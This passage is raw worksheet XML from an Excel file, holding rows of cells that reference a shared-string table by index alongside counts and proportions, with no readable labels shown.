        <v>1716</v>
      </c>
      <c r="F18" s="5" t="s">
        <v>1740</v>
      </c>
      <c r="G18" s="5" t="s">
        <v>1741</v>
      </c>
      <c r="H18" s="5" t="s">
        <v>1718</v>
      </c>
      <c r="I18" s="5" t="s">
        <v>185</v>
      </c>
      <c r="J18" s="5" t="s">
        <v>1742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4"/>
  <sheetViews>
    <sheetView zoomScale="75" zoomScaleNormal="75" workbookViewId="0">
      <pane xSplit="2" ySplit="4" topLeftCell="H5" activePane="bottomRight" state="frozenSplit"/>
      <selection pane="topRight" activeCell="C1" sqref="C1"/>
      <selection pane="bottomLeft" activeCell="A5" sqref="A5"/>
      <selection pane="bottomRight" sqref="A1:K1"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultColWidth="9" defaultRowHeight="15"/>
  <cols>
    <col min="1" max="2" width="45.625" style="42" customWidth="1"/>
    <col min="3" max="7" width="16.625" style="42" customWidth="1"/>
    <col min="8" max="9" width="48.625" style="42" customWidth="1"/>
    <col min="10" max="12" width="55.625" style="42" customWidth="1"/>
    <col min="13" max="16384" width="9" style="42"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:12" ht="24">
      <c r="A1" s="79" t="s">
        <v>2559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</row>
    <row r="2" spans="1:12">
      <c r="A2" s="114" t="s">
        <v>3418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44"/>
    </row>
    <row r="3" spans="1:12">
      <c r="A3" s="115" t="s">
        <v>2560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44"/>
    </row>
    <row r="4" spans="1:12" ht="30">
      <c r="A4" s="43" t="s">
        <v>150</v>
      </c>
      <c r="B4" s="43" t="s">
        <v>2561</v>
      </c>
      <c r="C4" s="43" t="s">
        <v>2562</v>
      </c>
      <c r="D4" s="43" t="s">
        <v>2563</v>
      </c>
      <c r="E4" s="43" t="s">
        <v>2425</v>
      </c>
      <c r="F4" s="43" t="s">
        <v>3419</v>
      </c>
      <c r="G4" s="43" t="s">
        <v>2564</v>
      </c>
      <c r="H4" s="43" t="s">
        <v>2427</v>
      </c>
      <c r="I4" s="43" t="s">
        <v>2565</v>
      </c>
      <c r="J4" s="43" t="s">
        <v>161</v>
      </c>
      <c r="K4" s="43" t="s">
        <v>708</v>
      </c>
      <c r="L4" s="44"/>
    </row>
    <row r="5" spans="1:12">
      <c r="A5" s="43" t="s">
        <v>770</v>
      </c>
      <c r="B5" s="43" t="s">
        <v>2430</v>
      </c>
      <c r="C5" s="44">
        <v>4</v>
      </c>
      <c r="D5" s="44">
        <v>5</v>
      </c>
      <c r="E5" s="44">
        <v>5</v>
      </c>
      <c r="F5" s="44">
        <v>19</v>
      </c>
      <c r="G5" s="45">
        <v>5.0131926121372031E-2</v>
      </c>
      <c r="H5" s="44">
        <v>0</v>
      </c>
      <c r="I5" s="43" t="s">
        <v>2566</v>
      </c>
      <c r="J5" s="43" t="s">
        <v>2567</v>
      </c>
      <c r="K5" s="43" t="s">
        <v>2568</v>
      </c>
      <c r="L5" s="44"/>
    </row>
    <row r="6" spans="1:12" ht="45">
      <c r="A6" s="43" t="s">
        <v>753</v>
      </c>
      <c r="B6" s="43" t="s">
        <v>2444</v>
      </c>
      <c r="C6" s="44">
        <v>4</v>
      </c>
      <c r="D6" s="44">
        <v>9</v>
      </c>
      <c r="E6" s="44">
        <v>7</v>
      </c>
      <c r="F6" s="44">
        <v>118</v>
      </c>
      <c r="G6" s="45">
        <v>0.31134564643799473</v>
      </c>
      <c r="H6" s="44">
        <v>0</v>
      </c>
      <c r="I6" s="43" t="s">
        <v>3421</v>
      </c>
      <c r="J6" s="43" t="s">
        <v>2567</v>
      </c>
      <c r="K6" s="43" t="s">
        <v>2569</v>
      </c>
      <c r="L6" s="44"/>
    </row>
    <row r="7" spans="1:12">
      <c r="A7" s="43" t="s">
        <v>447</v>
      </c>
      <c r="B7" s="43" t="s">
        <v>2454</v>
      </c>
      <c r="C7" s="44">
        <v>12</v>
      </c>
      <c r="D7" s="44">
        <v>9</v>
      </c>
      <c r="E7" s="44">
        <v>9</v>
      </c>
      <c r="F7" s="44">
        <v>109</v>
      </c>
      <c r="G7" s="45">
        <v>0.28759894459102903</v>
      </c>
      <c r="H7" s="44">
        <v>0</v>
      </c>
      <c r="I7" s="43" t="s">
        <v>2457</v>
      </c>
      <c r="J7" s="43" t="s">
        <v>2567</v>
      </c>
      <c r="K7" s="43" t="s">
        <v>2570</v>
      </c>
      <c r="L7" s="44"/>
    </row>
    <row r="8" spans="1:12" ht="30">
      <c r="A8" s="43" t="s">
        <v>604</v>
      </c>
      <c r="B8" s="43" t="s">
        <v>2461</v>
      </c>
      <c r="C8" s="44">
        <v>5</v>
      </c>
      <c r="D8" s="44">
        <v>5</v>
      </c>
      <c r="E8" s="44">
        <v>5</v>
      </c>
      <c r="F8" s="44">
        <v>133</v>
      </c>
      <c r="G8" s="45">
        <v>0.35092348284960423</v>
      </c>
      <c r="H8" s="44">
        <v>0</v>
      </c>
      <c r="I8" s="43" t="s">
        <v>2571</v>
      </c>
      <c r="J8" s="43" t="s">
        <v>2567</v>
      </c>
      <c r="K8" s="43" t="s">
        <v>2572</v>
      </c>
      <c r="L8" s="44"/>
    </row>
    <row r="9" spans="1:12">
      <c r="A9" s="43" t="s">
        <v>2573</v>
      </c>
      <c r="B9" s="43" t="s">
        <v>2574</v>
      </c>
      <c r="C9" s="44">
        <v>25</v>
      </c>
      <c r="D9" s="44">
        <v>9</v>
      </c>
      <c r="E9" s="44">
        <v>9</v>
      </c>
      <c r="F9" s="44">
        <v>379</v>
      </c>
      <c r="G9" s="45">
        <v>1</v>
      </c>
      <c r="H9" s="44">
        <v>0</v>
      </c>
      <c r="I9" s="43" t="s">
        <v>2575</v>
      </c>
      <c r="J9" s="43" t="s">
        <v>2576</v>
      </c>
      <c r="K9" s="43" t="s">
        <v>2577</v>
      </c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115" t="s">
        <v>2578</v>
      </c>
      <c r="B11" s="115"/>
      <c r="C11" s="115"/>
      <c r="D11" s="115"/>
      <c r="E11" s="115"/>
      <c r="F11" s="115"/>
      <c r="G11" s="115"/>
      <c r="H11" s="115"/>
      <c r="I11" s="115"/>
      <c r="J11" s="115"/>
      <c r="K11" s="44"/>
      <c r="L11" s="44"/>
    </row>
    <row r="12" spans="1:12" ht="45">
      <c r="A12" s="43" t="s">
        <v>34</v>
      </c>
      <c r="B12" s="43" t="s">
        <v>770</v>
      </c>
      <c r="C12" s="43" t="s">
        <v>753</v>
      </c>
      <c r="D12" s="43" t="s">
        <v>447</v>
      </c>
      <c r="E12" s="43" t="s">
        <v>604</v>
      </c>
      <c r="F12" s="43" t="s">
        <v>3419</v>
      </c>
      <c r="G12" s="43" t="s">
        <v>3420</v>
      </c>
      <c r="H12" s="43" t="s">
        <v>2580</v>
      </c>
      <c r="I12" s="43" t="s">
        <v>603</v>
      </c>
      <c r="J12" s="43" t="s">
        <v>2581</v>
      </c>
      <c r="K12" s="44"/>
      <c r="L12" s="44"/>
    </row>
    <row r="13" spans="1:12" ht="45">
      <c r="A13" s="43" t="s">
        <v>44</v>
      </c>
      <c r="B13" s="44">
        <v>0</v>
      </c>
      <c r="C13" s="44">
        <v>2</v>
      </c>
      <c r="D13" s="44">
        <v>2</v>
      </c>
      <c r="E13" s="44">
        <v>38</v>
      </c>
      <c r="F13" s="44">
        <v>42</v>
      </c>
      <c r="G13" s="43" t="s">
        <v>753</v>
      </c>
      <c r="H13" s="43" t="s">
        <v>2582</v>
      </c>
      <c r="I13" s="43" t="s">
        <v>2583</v>
      </c>
      <c r="J13" s="43" t="s">
        <v>2233</v>
      </c>
      <c r="K13" s="44"/>
      <c r="L13" s="44"/>
    </row>
    <row r="14" spans="1:12" ht="45">
      <c r="A14" s="43" t="s">
        <v>53</v>
      </c>
      <c r="B14" s="44">
        <v>0</v>
      </c>
      <c r="C14" s="44">
        <v>82</v>
      </c>
      <c r="D14" s="44">
        <v>54</v>
      </c>
      <c r="E14" s="44">
        <v>78</v>
      </c>
      <c r="F14" s="44">
        <v>214</v>
      </c>
      <c r="G14" s="43" t="s">
        <v>753</v>
      </c>
      <c r="H14" s="43" t="s">
        <v>2584</v>
      </c>
      <c r="I14" s="43" t="s">
        <v>2585</v>
      </c>
      <c r="J14" s="43" t="s">
        <v>2233</v>
      </c>
      <c r="K14" s="44"/>
      <c r="L14" s="44"/>
    </row>
    <row r="15" spans="1:12" ht="45">
      <c r="A15" s="43" t="s">
        <v>60</v>
      </c>
      <c r="B15" s="44">
        <v>0</v>
      </c>
      <c r="C15" s="44">
        <v>6</v>
      </c>
      <c r="D15" s="44">
        <v>16</v>
      </c>
      <c r="E15" s="44">
        <v>8</v>
      </c>
      <c r="F15" s="44">
        <v>30</v>
      </c>
      <c r="G15" s="43" t="s">
        <v>753</v>
      </c>
      <c r="H15" s="43" t="s">
        <v>2586</v>
      </c>
      <c r="I15" s="43" t="s">
        <v>2587</v>
      </c>
      <c r="J15" s="43" t="s">
        <v>2233</v>
      </c>
      <c r="K15" s="44"/>
      <c r="L15" s="44"/>
    </row>
    <row r="16" spans="1:12" ht="75">
      <c r="A16" s="43" t="s">
        <v>68</v>
      </c>
      <c r="B16" s="44">
        <v>4</v>
      </c>
      <c r="C16" s="44">
        <v>13</v>
      </c>
      <c r="D16" s="44">
        <v>12</v>
      </c>
      <c r="E16" s="44">
        <v>8</v>
      </c>
      <c r="F16" s="44">
        <v>37</v>
      </c>
      <c r="G16" s="43" t="s">
        <v>770</v>
      </c>
      <c r="H16" s="43" t="s">
        <v>2588</v>
      </c>
      <c r="I16" s="43" t="s">
        <v>2589</v>
      </c>
      <c r="J16" s="43" t="s">
        <v>2233</v>
      </c>
      <c r="K16" s="44"/>
      <c r="L16" s="44"/>
    </row>
    <row r="17" spans="1:12" ht="90">
      <c r="A17" s="43" t="s">
        <v>77</v>
      </c>
      <c r="B17" s="44">
        <v>5</v>
      </c>
      <c r="C17" s="44">
        <v>7</v>
      </c>
      <c r="D17" s="44">
        <v>1</v>
      </c>
      <c r="E17" s="44">
        <v>1</v>
      </c>
      <c r="F17" s="44">
        <v>14</v>
      </c>
      <c r="G17" s="43" t="s">
        <v>770</v>
      </c>
      <c r="H17" s="43" t="s">
        <v>2590</v>
      </c>
      <c r="I17" s="43" t="s">
        <v>2591</v>
      </c>
      <c r="J17" s="43" t="s">
        <v>2233</v>
      </c>
      <c r="K17" s="44"/>
      <c r="L17" s="44"/>
    </row>
    <row r="18" spans="1:12" ht="60">
      <c r="A18" s="43" t="s">
        <v>84</v>
      </c>
      <c r="B18" s="44">
        <v>0</v>
      </c>
      <c r="C18" s="44">
        <v>6</v>
      </c>
      <c r="D18" s="44">
        <v>12</v>
      </c>
      <c r="E18" s="44">
        <v>0</v>
      </c>
      <c r="F18" s="44">
        <v>18</v>
      </c>
      <c r="G18" s="43" t="s">
        <v>753</v>
      </c>
      <c r="H18" s="43" t="s">
        <v>2592</v>
      </c>
      <c r="I18" s="43" t="s">
        <v>2593</v>
      </c>
      <c r="J18" s="43" t="s">
        <v>2233</v>
      </c>
      <c r="K18" s="44"/>
      <c r="L18" s="44"/>
    </row>
    <row r="19" spans="1:12" ht="30">
      <c r="A19" s="43" t="s">
        <v>90</v>
      </c>
      <c r="B19" s="44">
        <v>1</v>
      </c>
      <c r="C19" s="44">
        <v>0</v>
      </c>
      <c r="D19" s="44">
        <v>4</v>
      </c>
      <c r="E19" s="44">
        <v>0</v>
      </c>
      <c r="F19" s="44">
        <v>5</v>
      </c>
      <c r="G19" s="43" t="s">
        <v>770</v>
      </c>
      <c r="H19" s="43" t="s">
        <v>2594</v>
      </c>
      <c r="I19" s="43" t="s">
        <v>803</v>
      </c>
      <c r="J19" s="43" t="s">
        <v>2233</v>
      </c>
      <c r="K19" s="44"/>
      <c r="L19" s="44"/>
    </row>
    <row r="20" spans="1:12" ht="45">
      <c r="A20" s="43" t="s">
        <v>97</v>
      </c>
      <c r="B20" s="44">
        <v>1</v>
      </c>
      <c r="C20" s="44">
        <v>2</v>
      </c>
      <c r="D20" s="44">
        <v>1</v>
      </c>
      <c r="E20" s="44">
        <v>0</v>
      </c>
      <c r="F20" s="44">
        <v>4</v>
      </c>
      <c r="G20" s="43" t="s">
        <v>770</v>
      </c>
      <c r="H20" s="43" t="s">
        <v>2595</v>
      </c>
      <c r="I20" s="43" t="s">
        <v>2596</v>
      </c>
      <c r="J20" s="43" t="s">
        <v>2233</v>
      </c>
      <c r="K20" s="44"/>
      <c r="L20" s="44"/>
    </row>
    <row r="21" spans="1:12" ht="75">
      <c r="A21" s="43" t="s">
        <v>31</v>
      </c>
      <c r="B21" s="44">
        <v>8</v>
      </c>
      <c r="C21" s="44">
        <v>0</v>
      </c>
      <c r="D21" s="44">
        <v>7</v>
      </c>
      <c r="E21" s="44">
        <v>0</v>
      </c>
      <c r="F21" s="44">
        <v>15</v>
      </c>
      <c r="G21" s="43" t="s">
        <v>770</v>
      </c>
      <c r="H21" s="43" t="s">
        <v>2597</v>
      </c>
      <c r="I21" s="43" t="s">
        <v>2598</v>
      </c>
      <c r="J21" s="43" t="s">
        <v>2233</v>
      </c>
      <c r="K21" s="44"/>
      <c r="L21" s="44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>
      <c r="A23" s="115" t="s">
        <v>2599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pans="1:12">
      <c r="A24" s="43" t="s">
        <v>2561</v>
      </c>
      <c r="B24" s="43" t="s">
        <v>602</v>
      </c>
      <c r="C24" s="43" t="s">
        <v>150</v>
      </c>
      <c r="D24" s="43" t="s">
        <v>34</v>
      </c>
      <c r="E24" s="43" t="s">
        <v>114</v>
      </c>
      <c r="F24" s="43" t="s">
        <v>815</v>
      </c>
      <c r="G24" s="43" t="s">
        <v>816</v>
      </c>
      <c r="H24" s="43" t="s">
        <v>2600</v>
      </c>
      <c r="I24" s="43" t="s">
        <v>2601</v>
      </c>
      <c r="J24" s="43" t="s">
        <v>2219</v>
      </c>
      <c r="K24" s="43" t="s">
        <v>2602</v>
      </c>
      <c r="L24" s="43" t="s">
        <v>2603</v>
      </c>
    </row>
    <row r="25" spans="1:12" ht="45">
      <c r="A25" s="43" t="s">
        <v>2430</v>
      </c>
      <c r="B25" s="43" t="s">
        <v>985</v>
      </c>
      <c r="C25" s="43" t="s">
        <v>770</v>
      </c>
      <c r="D25" s="43" t="s">
        <v>90</v>
      </c>
      <c r="E25" s="43" t="s">
        <v>91</v>
      </c>
      <c r="F25" s="43" t="s">
        <v>2604</v>
      </c>
      <c r="G25" s="43" t="s">
        <v>803</v>
      </c>
      <c r="H25" s="44">
        <v>1</v>
      </c>
      <c r="I25" s="43" t="s">
        <v>824</v>
      </c>
      <c r="J25" s="43" t="s">
        <v>2605</v>
      </c>
      <c r="K25" s="43" t="s">
        <v>987</v>
      </c>
      <c r="L25" s="43" t="s">
        <v>826</v>
      </c>
    </row>
    <row r="26" spans="1:12" ht="45">
      <c r="A26" s="43" t="s">
        <v>2430</v>
      </c>
      <c r="B26" s="43" t="s">
        <v>985</v>
      </c>
      <c r="C26" s="43" t="s">
        <v>770</v>
      </c>
      <c r="D26" s="43" t="s">
        <v>97</v>
      </c>
      <c r="E26" s="43" t="s">
        <v>98</v>
      </c>
      <c r="F26" s="43" t="s">
        <v>2604</v>
      </c>
      <c r="G26" s="43" t="s">
        <v>803</v>
      </c>
      <c r="H26" s="44">
        <v>1</v>
      </c>
      <c r="I26" s="43" t="s">
        <v>824</v>
      </c>
      <c r="J26" s="43" t="s">
        <v>2606</v>
      </c>
      <c r="K26" s="43" t="s">
        <v>987</v>
      </c>
      <c r="L26" s="43" t="s">
        <v>826</v>
      </c>
    </row>
    <row r="27" spans="1:12" ht="45">
      <c r="A27" s="43" t="s">
        <v>2430</v>
      </c>
      <c r="B27" s="43" t="s">
        <v>992</v>
      </c>
      <c r="C27" s="43" t="s">
        <v>770</v>
      </c>
      <c r="D27" s="43" t="s">
        <v>68</v>
      </c>
      <c r="E27" s="43" t="s">
        <v>69</v>
      </c>
      <c r="F27" s="43" t="s">
        <v>2475</v>
      </c>
      <c r="G27" s="43" t="s">
        <v>797</v>
      </c>
      <c r="H27" s="44">
        <v>4</v>
      </c>
      <c r="I27" s="43" t="s">
        <v>824</v>
      </c>
      <c r="J27" s="43" t="s">
        <v>2607</v>
      </c>
      <c r="K27" s="43" t="s">
        <v>993</v>
      </c>
      <c r="L27" s="43" t="s">
        <v>826</v>
      </c>
    </row>
    <row r="28" spans="1:12" ht="45">
      <c r="A28" s="43" t="s">
        <v>2430</v>
      </c>
      <c r="B28" s="43" t="s">
        <v>992</v>
      </c>
      <c r="C28" s="43" t="s">
        <v>770</v>
      </c>
      <c r="D28" s="43" t="s">
        <v>77</v>
      </c>
      <c r="E28" s="43" t="s">
        <v>78</v>
      </c>
      <c r="F28" s="43" t="s">
        <v>2475</v>
      </c>
      <c r="G28" s="43" t="s">
        <v>797</v>
      </c>
      <c r="H28" s="44">
        <v>4</v>
      </c>
      <c r="I28" s="43" t="s">
        <v>824</v>
      </c>
      <c r="J28" s="43" t="s">
        <v>2608</v>
      </c>
      <c r="K28" s="43" t="s">
        <v>993</v>
      </c>
      <c r="L28" s="43" t="s">
        <v>826</v>
      </c>
    </row>
    <row r="29" spans="1:12" ht="45">
      <c r="A29" s="43" t="s">
        <v>2430</v>
      </c>
      <c r="B29" s="43" t="s">
        <v>992</v>
      </c>
      <c r="C29" s="43" t="s">
        <v>770</v>
      </c>
      <c r="D29" s="43" t="s">
        <v>31</v>
      </c>
      <c r="E29" s="43" t="s">
        <v>995</v>
      </c>
      <c r="F29" s="43" t="s">
        <v>2475</v>
      </c>
      <c r="G29" s="43" t="s">
        <v>797</v>
      </c>
      <c r="H29" s="44">
        <v>4</v>
      </c>
      <c r="I29" s="43" t="s">
        <v>824</v>
      </c>
      <c r="J29" s="43" t="s">
        <v>2609</v>
      </c>
      <c r="K29" s="43" t="s">
        <v>993</v>
      </c>
      <c r="L29" s="43" t="s">
        <v>826</v>
      </c>
    </row>
    <row r="30" spans="1:12" ht="45">
      <c r="A30" s="43" t="s">
        <v>2430</v>
      </c>
      <c r="B30" s="43" t="s">
        <v>998</v>
      </c>
      <c r="C30" s="43" t="s">
        <v>770</v>
      </c>
      <c r="D30" s="43" t="s">
        <v>77</v>
      </c>
      <c r="E30" s="43" t="s">
        <v>78</v>
      </c>
      <c r="F30" s="43" t="s">
        <v>2483</v>
      </c>
      <c r="G30" s="43" t="s">
        <v>804</v>
      </c>
      <c r="H30" s="44">
        <v>1</v>
      </c>
      <c r="I30" s="43" t="s">
        <v>824</v>
      </c>
      <c r="J30" s="43" t="s">
        <v>2610</v>
      </c>
      <c r="K30" s="43" t="s">
        <v>1000</v>
      </c>
      <c r="L30" s="43" t="s">
        <v>826</v>
      </c>
    </row>
    <row r="31" spans="1:12" ht="45">
      <c r="A31" s="43" t="s">
        <v>2430</v>
      </c>
      <c r="B31" s="43" t="s">
        <v>1004</v>
      </c>
      <c r="C31" s="43" t="s">
        <v>770</v>
      </c>
      <c r="D31" s="43" t="s">
        <v>31</v>
      </c>
      <c r="E31" s="43" t="s">
        <v>1002</v>
      </c>
      <c r="F31" s="43" t="s">
        <v>28</v>
      </c>
      <c r="G31" s="43" t="s">
        <v>798</v>
      </c>
      <c r="H31" s="44">
        <v>4</v>
      </c>
      <c r="I31" s="43" t="s">
        <v>824</v>
      </c>
      <c r="J31" s="43" t="s">
        <v>2611</v>
      </c>
      <c r="K31" s="43" t="s">
        <v>1006</v>
      </c>
      <c r="L31" s="43" t="s">
        <v>826</v>
      </c>
    </row>
    <row r="32" spans="1:12" ht="45">
      <c r="A32" s="43" t="s">
        <v>2444</v>
      </c>
      <c r="B32" s="43" t="s">
        <v>951</v>
      </c>
      <c r="C32" s="43" t="s">
        <v>753</v>
      </c>
      <c r="D32" s="43" t="s">
        <v>44</v>
      </c>
      <c r="E32" s="43" t="s">
        <v>45</v>
      </c>
      <c r="F32" s="43" t="s">
        <v>2604</v>
      </c>
      <c r="G32" s="43" t="s">
        <v>803</v>
      </c>
      <c r="H32" s="44">
        <v>2</v>
      </c>
      <c r="I32" s="43" t="s">
        <v>824</v>
      </c>
      <c r="J32" s="43" t="s">
        <v>2612</v>
      </c>
      <c r="K32" s="43" t="s">
        <v>954</v>
      </c>
      <c r="L32" s="43" t="s">
        <v>826</v>
      </c>
    </row>
    <row r="33" spans="1:12" ht="45">
      <c r="A33" s="43" t="s">
        <v>2444</v>
      </c>
      <c r="B33" s="43" t="s">
        <v>951</v>
      </c>
      <c r="C33" s="43" t="s">
        <v>753</v>
      </c>
      <c r="D33" s="43" t="s">
        <v>84</v>
      </c>
      <c r="E33" s="43" t="s">
        <v>85</v>
      </c>
      <c r="F33" s="43" t="s">
        <v>2604</v>
      </c>
      <c r="G33" s="43" t="s">
        <v>803</v>
      </c>
      <c r="H33" s="44">
        <v>2</v>
      </c>
      <c r="I33" s="43" t="s">
        <v>824</v>
      </c>
      <c r="J33" s="43" t="s">
        <v>2613</v>
      </c>
      <c r="K33" s="43" t="s">
        <v>954</v>
      </c>
      <c r="L33" s="43" t="s">
        <v>826</v>
      </c>
    </row>
    <row r="34" spans="1:12" ht="45">
      <c r="A34" s="43" t="s">
        <v>2444</v>
      </c>
      <c r="B34" s="43" t="s">
        <v>961</v>
      </c>
      <c r="C34" s="43" t="s">
        <v>753</v>
      </c>
      <c r="D34" s="43" t="s">
        <v>53</v>
      </c>
      <c r="E34" s="43" t="s">
        <v>54</v>
      </c>
      <c r="F34" s="43" t="s">
        <v>2475</v>
      </c>
      <c r="G34" s="43" t="s">
        <v>797</v>
      </c>
      <c r="H34" s="44">
        <v>82</v>
      </c>
      <c r="I34" s="43" t="s">
        <v>824</v>
      </c>
      <c r="J34" s="43" t="s">
        <v>2614</v>
      </c>
      <c r="K34" s="43" t="s">
        <v>962</v>
      </c>
      <c r="L34" s="43" t="s">
        <v>826</v>
      </c>
    </row>
    <row r="35" spans="1:12" ht="45">
      <c r="A35" s="43" t="s">
        <v>2444</v>
      </c>
      <c r="B35" s="43" t="s">
        <v>961</v>
      </c>
      <c r="C35" s="43" t="s">
        <v>753</v>
      </c>
      <c r="D35" s="43" t="s">
        <v>60</v>
      </c>
      <c r="E35" s="43" t="s">
        <v>61</v>
      </c>
      <c r="F35" s="43" t="s">
        <v>2475</v>
      </c>
      <c r="G35" s="43" t="s">
        <v>797</v>
      </c>
      <c r="H35" s="44">
        <v>6</v>
      </c>
      <c r="I35" s="43" t="s">
        <v>824</v>
      </c>
      <c r="J35" s="43" t="s">
        <v>2615</v>
      </c>
      <c r="K35" s="43" t="s">
        <v>962</v>
      </c>
      <c r="L35" s="43" t="s">
        <v>826</v>
      </c>
    </row>
    <row r="36" spans="1:12" ht="45">
      <c r="A36" s="43" t="s">
        <v>2444</v>
      </c>
      <c r="B36" s="43" t="s">
        <v>961</v>
      </c>
      <c r="C36" s="43" t="s">
        <v>753</v>
      </c>
      <c r="D36" s="43" t="s">
        <v>68</v>
      </c>
      <c r="E36" s="43" t="s">
        <v>69</v>
      </c>
      <c r="F36" s="43" t="s">
        <v>2475</v>
      </c>
      <c r="G36" s="43" t="s">
        <v>797</v>
      </c>
      <c r="H36" s="44">
        <v>8</v>
      </c>
      <c r="I36" s="43" t="s">
        <v>824</v>
      </c>
      <c r="J36" s="43" t="s">
        <v>2616</v>
      </c>
      <c r="K36" s="43" t="s">
        <v>962</v>
      </c>
      <c r="L36" s="43" t="s">
        <v>826</v>
      </c>
    </row>
    <row r="37" spans="1:12" ht="45">
      <c r="A37" s="43" t="s">
        <v>2444</v>
      </c>
      <c r="B37" s="43" t="s">
        <v>961</v>
      </c>
      <c r="C37" s="43" t="s">
        <v>753</v>
      </c>
      <c r="D37" s="43" t="s">
        <v>77</v>
      </c>
      <c r="E37" s="43" t="s">
        <v>78</v>
      </c>
      <c r="F37" s="43" t="s">
        <v>2475</v>
      </c>
      <c r="G37" s="43" t="s">
        <v>797</v>
      </c>
      <c r="H37" s="44">
        <v>6</v>
      </c>
      <c r="I37" s="43" t="s">
        <v>824</v>
      </c>
      <c r="J37" s="43" t="s">
        <v>2617</v>
      </c>
      <c r="K37" s="43" t="s">
        <v>962</v>
      </c>
      <c r="L37" s="43" t="s">
        <v>826</v>
      </c>
    </row>
    <row r="38" spans="1:12" ht="45">
      <c r="A38" s="43" t="s">
        <v>2444</v>
      </c>
      <c r="B38" s="43" t="s">
        <v>961</v>
      </c>
      <c r="C38" s="43" t="s">
        <v>753</v>
      </c>
      <c r="D38" s="43" t="s">
        <v>84</v>
      </c>
      <c r="E38" s="43" t="s">
        <v>85</v>
      </c>
      <c r="F38" s="43" t="s">
        <v>2475</v>
      </c>
      <c r="G38" s="43" t="s">
        <v>797</v>
      </c>
      <c r="H38" s="44">
        <v>4</v>
      </c>
      <c r="I38" s="43" t="s">
        <v>824</v>
      </c>
      <c r="J38" s="43" t="s">
        <v>2618</v>
      </c>
      <c r="K38" s="43" t="s">
        <v>962</v>
      </c>
      <c r="L38" s="43" t="s">
        <v>826</v>
      </c>
    </row>
    <row r="39" spans="1:12" ht="45">
      <c r="A39" s="43" t="s">
        <v>2444</v>
      </c>
      <c r="B39" s="43" t="s">
        <v>961</v>
      </c>
      <c r="C39" s="43" t="s">
        <v>753</v>
      </c>
      <c r="D39" s="43" t="s">
        <v>97</v>
      </c>
      <c r="E39" s="43" t="s">
        <v>972</v>
      </c>
      <c r="F39" s="43" t="s">
        <v>2475</v>
      </c>
      <c r="G39" s="43" t="s">
        <v>797</v>
      </c>
      <c r="H39" s="44">
        <v>2</v>
      </c>
      <c r="I39" s="43" t="s">
        <v>824</v>
      </c>
      <c r="J39" s="43" t="s">
        <v>2619</v>
      </c>
      <c r="K39" s="43" t="s">
        <v>962</v>
      </c>
      <c r="L39" s="43" t="s">
        <v>826</v>
      </c>
    </row>
    <row r="40" spans="1:12" ht="45">
      <c r="A40" s="43" t="s">
        <v>2444</v>
      </c>
      <c r="B40" s="43" t="s">
        <v>975</v>
      </c>
      <c r="C40" s="43" t="s">
        <v>753</v>
      </c>
      <c r="D40" s="43" t="s">
        <v>68</v>
      </c>
      <c r="E40" s="43" t="s">
        <v>974</v>
      </c>
      <c r="F40" s="43" t="s">
        <v>2620</v>
      </c>
      <c r="G40" s="43" t="s">
        <v>977</v>
      </c>
      <c r="H40" s="44">
        <v>3</v>
      </c>
      <c r="I40" s="43" t="s">
        <v>824</v>
      </c>
      <c r="J40" s="43" t="s">
        <v>2621</v>
      </c>
      <c r="K40" s="43" t="s">
        <v>978</v>
      </c>
      <c r="L40" s="43" t="s">
        <v>826</v>
      </c>
    </row>
    <row r="41" spans="1:12" ht="45">
      <c r="A41" s="43" t="s">
        <v>2444</v>
      </c>
      <c r="B41" s="43" t="s">
        <v>975</v>
      </c>
      <c r="C41" s="43" t="s">
        <v>753</v>
      </c>
      <c r="D41" s="43" t="s">
        <v>68</v>
      </c>
      <c r="E41" s="43" t="s">
        <v>974</v>
      </c>
      <c r="F41" s="43" t="s">
        <v>2622</v>
      </c>
      <c r="G41" s="43" t="s">
        <v>977</v>
      </c>
      <c r="H41" s="44">
        <v>2</v>
      </c>
      <c r="I41" s="43" t="s">
        <v>824</v>
      </c>
      <c r="J41" s="43" t="s">
        <v>2621</v>
      </c>
      <c r="K41" s="43" t="s">
        <v>978</v>
      </c>
      <c r="L41" s="43" t="s">
        <v>826</v>
      </c>
    </row>
    <row r="42" spans="1:12" ht="45">
      <c r="A42" s="43" t="s">
        <v>2444</v>
      </c>
      <c r="B42" s="43" t="s">
        <v>980</v>
      </c>
      <c r="C42" s="43" t="s">
        <v>753</v>
      </c>
      <c r="D42" s="43" t="s">
        <v>77</v>
      </c>
      <c r="E42" s="43" t="s">
        <v>78</v>
      </c>
      <c r="F42" s="43" t="s">
        <v>2483</v>
      </c>
      <c r="G42" s="43" t="s">
        <v>804</v>
      </c>
      <c r="H42" s="44">
        <v>1</v>
      </c>
      <c r="I42" s="43" t="s">
        <v>824</v>
      </c>
      <c r="J42" s="43" t="s">
        <v>2610</v>
      </c>
      <c r="K42" s="43" t="s">
        <v>982</v>
      </c>
      <c r="L42" s="43" t="s">
        <v>826</v>
      </c>
    </row>
    <row r="43" spans="1:12" ht="45">
      <c r="A43" s="43" t="s">
        <v>2454</v>
      </c>
      <c r="B43" s="43" t="s">
        <v>1008</v>
      </c>
      <c r="C43" s="43" t="s">
        <v>447</v>
      </c>
      <c r="D43" s="43" t="s">
        <v>44</v>
      </c>
      <c r="E43" s="43" t="s">
        <v>45</v>
      </c>
      <c r="F43" s="43" t="s">
        <v>2604</v>
      </c>
      <c r="G43" s="43" t="s">
        <v>803</v>
      </c>
      <c r="H43" s="44">
        <v>2</v>
      </c>
      <c r="I43" s="43" t="s">
        <v>824</v>
      </c>
      <c r="J43" s="43" t="s">
        <v>2612</v>
      </c>
      <c r="K43" s="43" t="s">
        <v>1009</v>
      </c>
      <c r="L43" s="43" t="s">
        <v>826</v>
      </c>
    </row>
    <row r="44" spans="1:12" ht="45">
      <c r="A44" s="43" t="s">
        <v>2454</v>
      </c>
      <c r="B44" s="43" t="s">
        <v>1011</v>
      </c>
      <c r="C44" s="43" t="s">
        <v>447</v>
      </c>
      <c r="D44" s="43" t="s">
        <v>53</v>
      </c>
      <c r="E44" s="43" t="s">
        <v>54</v>
      </c>
      <c r="F44" s="43" t="s">
        <v>2475</v>
      </c>
      <c r="G44" s="43" t="s">
        <v>797</v>
      </c>
      <c r="H44" s="44">
        <v>54</v>
      </c>
      <c r="I44" s="43" t="s">
        <v>824</v>
      </c>
      <c r="J44" s="43" t="s">
        <v>2623</v>
      </c>
      <c r="K44" s="43" t="s">
        <v>1012</v>
      </c>
      <c r="L44" s="43" t="s">
        <v>826</v>
      </c>
    </row>
    <row r="45" spans="1:12" ht="45">
      <c r="A45" s="43" t="s">
        <v>2454</v>
      </c>
